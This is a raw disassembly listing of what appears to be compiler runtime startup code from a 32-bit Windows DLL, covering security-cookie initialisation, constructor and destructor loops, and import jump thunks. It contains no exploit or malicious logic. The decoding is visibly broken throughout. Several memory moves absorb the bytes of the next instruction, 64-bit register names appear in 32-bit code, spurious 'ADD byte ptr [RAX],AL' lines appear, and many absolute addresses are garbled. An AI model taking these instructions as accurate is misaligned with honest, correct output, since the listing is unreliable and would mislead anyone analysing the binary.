6bac1822 | c7 04 24 08 00 00 00 | MOV | MOV dword ptr [RSP],0x8
6bac1829 | e8 aa 10 00 00 | CALL | CALL 0x6bac28d8
6bac182e | a1 ac 53 ac 6b 89 04 24 e8 | MOV | MOV EAX,[0xe82404896bac53ac]
6bac1837 | 85 02 | TEST | TEST dword ptr [RDX],EAX
6bac1839 | 00 00 | ADD | ADD byte ptr [RAX],AL
6bac183b | 89 44 24 18 | MOV | MOV dword ptr [RSP + 0x18],EAX
6bac183f | a1 a8 53 ac 6b 89 04 24 e8 | MOV | MOV EAX,[0xe82404896bac53a8]
6bac1848 | 74 02 | JZ | JZ 0x6bac184c
6bac184a | 00 00 | ADD | ADD byte ptr [RAX],AL
6bac184c | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac184f | 89 44 24 1c | MOV | MOV dword ptr [RSP + 0x1c],EAX
6bac1853 | 8d 44 24 1c | LEA | LEA EAX,[RSP + 0x1c]
6bac1857 | 89 44 24 08 | MOV | MOV dword ptr [RSP + 0x8],EAX
6bac185b | 8d 44 24 18 | LEA | LEA EAX,[RSP + 0x18]
6bac185f | 89 44 24 04 | MOV | MOV dword ptr [RSP + 0x4],EAX
6bac1863 | e8 78 10 00 00 | CALL | CALL 0x6bac28e0
6bac1868 | 89 c3 | MOV | MOV EBX,EAX
6bac186a | 8b 44 24 18 | MOV | MOV EAX,dword ptr [RSP + 0x18]
6bac186e | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac1871 | e8 5a 02 00 00 | CALL | CALL 0x6bac1ad0
6bac1876 | a3 ac 53 ac 6b 8b 44 24 1c | MOV | MOV [0x1c24448b6bac53ac],EAX
6bac187f | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac1882 | e8 49 02 00 00 | CALL | CALL 0x6bac1ad0
6bac1887 | c7 04 24 08 00 00 00 | MOV | MOV dword ptr [RSP],0x8
6bac188e | a3 a8 53 ac 6b e8 50 10 00 | MOV | MOV [0x1050e86bac53a8],EAX
6bac1897 | 00 83 c4 28 89 d8 | ADD | ADD byte ptr [RBX + -0x2776d73c],AL
6bac189d | 5b | POP | POP RBX
6bac189e | c3 | RET | RET
6bac18a0 | 89 1c 24 | MOV | MOV dword ptr [RSP],EBX
6bac18a3 | ff 15 98 71 ac 6b | CALL | CALL qword ptr [0xd7588a41]
6bac18a9 | 83 c4 28 | ADD | ADD ESP,0x28
6bac18ac | 89 c3 | MOV | MOV EBX,EAX
6bac18ae | 89 d8 | MOV | MOV EAX,EBX
6bac18b0 | 5b | POP | POP RBX
6bac18b1 | c3 | RET | RET
6bac18c0 | 83 ec 1c | SUB | SUB ESP,0x1c
6bac18c3 | 8b 44 24 20 | MOV | MOV EAX,dword ptr [RSP + 0x20]
6bac18c7 | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac18ca | e8 31 ff ff ff | CALL | CALL 0x6bac1800
6bac18cf | 83 f8 01 | CMP | CMP EAX,0x1
6bac18d2 | 19 c0 | SBB | SBB EAX,EAX
6bac18d4 | 83 c4 1c | ADD | ADD ESP,0x1c
6bac18d7 | c3 | RET | RET
6bac1ac0 | 8b 44 24 04 | MOV | MOV EAX,dword ptr [RSP + 0x4]
6bac1ac4 | c3 | RET | RET
6bac1ad0 | 8b 44 24 04 | MOV | MOV EAX,dword ptr [RSP + 0x4]
6bac1ad4 | c3 | RET | RET
6bac1d80 | 55 | PUSH | PUSH RBP
6bac1d81 | 89 e5 | MOV | MOV EBP,ESP
6bac1d83 | 57 | PUSH | PUSH RDI
6bac1d84 | 56 | PUSH | PUSH RSI
6bac1d85 | 53 | PUSH | PUSH RBX
6bac1d86 | 83 ec 4c | SUB | SUB ESP,0x4c
6bac1d89 | a1 1c 50 ac 6b 85 c0 74 0e | MOV | MOV EAX,[0xe74c0856bac501c]
6bac1d92 | 8d 65 f4 | LEA | LEA ESP,[RBP + -0xc]
6bac1d95 | 5b | POP | POP RBX
6bac1d96 | 5e | POP | POP RSI
6bac1d97 | 5f | POP | POP RDI
6bac1d98 | 5d | POP | POP RBP
6bac1d99 | c3 | RET | RET
6bac2030 | 83 ec 0c | SUB | SUB ESP,0xc
6bac2033 | a1 08 34 ac 6b 8b 00 85 c0 | MOV | MOV EAX,[0xc085008b6bac3408]
6bac203c | 74 19 | JZ | JZ 0x6bac2057
6bac203e | 66 90 | NOP | NOP
6bac2040 | ff d0 | CALL | CALL RAX
6bac2042 | a1 08 34 ac 6b 8d 50 04 8b | MOV | MOV EAX,[0x8b04508d6bac3408]
6bac204b | 40 04 89 | ADD | ADD AL,0x89
6bac204e | 15 08 34 ac 6b | ADC | ADC EAX,0x6bac3408
6bac2053 | 85 c0 | TEST | TEST EAX,EAX
6bac2055 | 75 e9 | JNZ | JNZ 0x6bac2040
6bac2057 | 83 c4 0c | ADD | ADD ESP,0xc
6bac205a | c3 | RET | RET
6bac2060 | 53 | PUSH | PUSH RBX
6bac2061 | 83 ec 18 | SUB | SUB ESP,0x18
6bac2064 | 8b 1d 50 29 ac 6b | MOV | MOV EBX,dword ptr [0xd75849ba]
6bac206a | 83 fb ff | CMP | CMP EBX,-0x1
6bac206d | 74 24 | JZ | JZ 0x6bac2093
6bac206f | 85 db | TEST | TEST EBX,EBX
6bac2071 | 74 0f | JZ | JZ 0x6bac2082
6bac2073 | ff 14 9d 50 29 ac 6b | CALL | CALL qword ptr [0x6bac2950 + RBX*0x4]
6bac207a | 83 eb 01 | SUB | SUB EBX,0x1
6bac207d | 8d 76 00 | LEA | LEA ESI,[RSI]
6bac2080 | 75 f1 | JNZ | JNZ 0x6bac2073
6bac2082 | c7 04 24 30 20 ac 6b | MOV | MOV dword ptr [RSP],0x6bac2030
6bac2089 | e8 32 f8 ff ff | CALL | CALL 0x6bac18c0
6bac208e | 83 c4 18 | ADD | ADD ESP,0x18
6bac2091 | 5b | POP | POP RBX
6bac2092 | c3 | RET | RET
6bac2093 | 31 db | XOR | XOR EBX,EBX
6bac2095 | eb 02 | JMP | JMP 0x6bac2099
6bac2097 | 89 c3 | MOV | MOV EBX,EAX
6bac2099 | 8d 43 01 | LEA | LEA EAX,[RBX + 0x1]
6bac209c | 8b 14 85 50 29 ac 6b | MOV | MOV EDX,dword ptr [0x6bac2950 + RAX*0x4]
6bac20a3 | 85 d2 | TEST | TEST EDX,EDX
6bac20a5 | 75 f0 | JNZ | JNZ 0x6bac2097
6bac20a7 | eb c6 | JMP | JMP 0x6bac206f
6bac20b0 | 8b 0d 28 50 ac 6b | MOV | MOV ECX,dword ptr [0xd75870de]
6bac20b6 | 85 c9 | TEST | TEST ECX,ECX
6bac20b8 | 74 06 | JZ | JZ 0x6bac20c0
6bac20ba | f3 c3 | RET | RET
6bac20c0 | c7 05 28 50 ac 6b 01 00 00 00 | MOV | MOV dword ptr [0xd75870f2],0x1
6bac20ca | eb 94 | JMP | JMP 0x6bac2060
6bac20d0 | 83 ec 4c | SUB | SUB ESP,0x4c
6bac20d3 | a1 10 34 ac 6b 89 5c 24 3c | MOV | MOV EAX,[0x3c245c896bac3410]
6bac20dc | 89 74 24 40 | MOV | MOV dword ptr [RSP + 0x40],ESI
6bac20e0 | 89 7c 24 44 | MOV | MOV dword ptr [RSP + 0x44],EDI
6bac20e4 | 3d 4e e6 40 bb | CMP | CMP EAX,0xbb40e64e
6bac20e9 | 89 6c 24 48 | MOV | MOV dword ptr [RSP + 0x48],EBP
6bac20ed | c7 44 24 20 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x20],0x0
6bac20f5 | c7 44 24 24 00 00 00 00 | MOV | MOV dword ptr [RSP + 0x24],0x0
6bac20fd | 74 21 | JZ | JZ 0x6bac2120
6bac20ff | f7 d0 | NOT | NOT EAX
6bac2101 | a3 14 34 ac 6b 8b 5c 24 3c | MOV | MOV [0x3c245c8b6bac3414],EAX
6bac210a | 8b 74 24 40 | MOV | MOV ESI,dword ptr [RSP + 0x40]
6bac210e | 8b 7c 24 44 | MOV | MOV EDI,dword ptr [RSP + 0x44]
6bac2112 | 8b 6c 24 48 | MOV | MOV EBP,dword ptr [RSP + 0x48]
6bac2116 | 83 c4 4c | ADD | ADD ESP,0x4c
6bac2119 | c3 | RET | RET
6bac2120 | 8d 44 24 20 | LEA | LEA EAX,[RSP + 0x20]
6bac2124 | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac2127 | ff 15 3c 71 ac 6b | CALL | CALL qword ptr [0xd7589269]
6bac212d | 83 ec 04 | SUB | SUB ESP,0x4
6bac2130 | 8b 44 24 24 | MOV | MOV EAX,dword ptr [RSP + 0x24]
6bac2134 | 8b 6c 24 20 | MOV | MOV EBP,dword ptr [RSP + 0x20]
6bac2138 | 89 44 24 1c | MOV | MOV dword ptr [RSP + 0x1c],EAX
6bac213c | ff 15 24 71 ac 6b | CALL | CALL qword ptr [0xd7589266]
6bac2142 | 89 c7 | MOV | MOV EDI,EAX
6bac2144 | ff 15 28 71 ac 6b | CALL | CALL qword ptr [0xd7589272]
6bac214a | 89 c6 | MOV | MOV ESI,EAX
6bac214c | ff 15 40 71 ac 6b | CALL | CALL qword ptr [0xd7589292]
6bac2152 | 89 c3 | MOV | MOV EBX,EAX
6bac2154 | 8d 44 24 28 | LEA | LEA EAX,[RSP + 0x28]
6bac2158 | 89 04 24 | MOV | MOV dword ptr [RSP],EAX
6bac215b | ff 15 58 71 ac 6b | CALL | CALL qword ptr [0xd75892b9]
6bac2161 | 83 ec 04 | SUB | SUB ESP,0x4
6bac2164 | 33 6c 24 1c | XOR | XOR EBP,dword ptr [RSP + 0x1c]
6bac2168 | 33 6c 24 28 | XOR | XOR EBP,dword ptr [RSP + 0x28]
6bac216c | 33 6c 24 2c | XOR | XOR EBP,dword ptr [RSP + 0x2c]
6bac2170 | 31 fd | XOR | XOR EBP,EDI
6bac2172 | 31 f5 | XOR | XOR EBP,ESI
6bac2174 | 31 dd | XOR | XOR EBP,EBX
6bac2176 | 89 e8 | MOV | MOV EAX,EBP
6bac2178 | 81 fd 4e e6 40 bb | CMP | CMP EBP,0xbb40e64e
6bac217e | f7 d0 | NOT | NOT EAX
6bac2180 | 74 10 | JZ | JZ 0x6bac2192
6bac2182 | 89 2d 10 34 ac 6b | MOV | MOV dword ptr [0xd7585598],EBP
6bac2188 | a3 14 34 ac 6b e9 74 ff ff | MOV | MOV [0xffff74e96bac3414],EAX
6bac2191 | ff b8 b0 19 bf 44 | INC | INC dword ptr [RAX + 0x44bf19b0]
6bac2197 | bd 4f e6 40 bb | MOV | MOV EBP,0xbb40e64f
6bac219c | eb e4 | JMP | JMP 0x6bac2182
6bac2880 | 8b 44 24 0c | MOV | MOV EAX,dword ptr [RSP + 0xc]
6bac2884 | 8b 54 24 08 | MOV | MOV EDX,dword ptr [RSP + 0x8]
6bac2888 | 8b 4c 24 04 | MOV | MOV ECX,dword ptr [RSP + 0x4]
6bac288c | f0 0f b1 11 | CMPXCHG.LOCK | CMPXCHG.LOCK dword ptr [RCX],EDX
6bac2890 | c2 0c 00 | RET | RET 0xc
6bac28a0 | b8 01 00 00 00 | MOV | MOV EAX,0x1
6bac28a5 | c2 0c 00 | RET | RET 0xc
6bac28b0 | ff 25 bc 71 ac 6b | JMP | JMP qword ptr [0xd7589a72]
6bac28c0 | ff 25 b4 71 ac 6b | JMP | JMP qword ptr [0xd7589a7a]
6bac28d0 | ff 25 b0 71 ac 6b | JMP | JMP qword ptr [0xd7589a86]
6bac28d8 | ff 25 94 71 ac 6b | JMP | JMP qword ptr [0xd7589a72]
6bac28e0 | ff 25 84 71 ac 6b | JMP | JMP qword ptr [0xd7589a6a]
